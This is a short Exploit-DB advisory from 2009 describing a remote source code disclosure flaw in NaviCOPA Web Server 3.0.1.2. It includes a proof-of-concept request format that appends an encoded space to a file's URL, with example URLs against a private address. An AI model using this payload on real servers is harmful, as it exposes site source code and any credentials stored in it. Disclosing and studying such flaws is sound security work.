NaviCOPA 3.0.1.2 - Source Disclosure

EDB-ID:

9900

CVE:

N/A

Author:

Dr_IDE

Type:

remote

Platform:

Windows

Published:

2009-10-14

################################################
#
# NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.navicopa.com/download.html
#
################################################

- Description -

NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the latest
version of the application available.

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the
following means.

- Technical Details -

http://[ webserver IP]/[ file ][%20]

http://172.16.2.101/index.html%20
http://172.16.2.101/index.php%20

[pocoftheday.blogspot.com]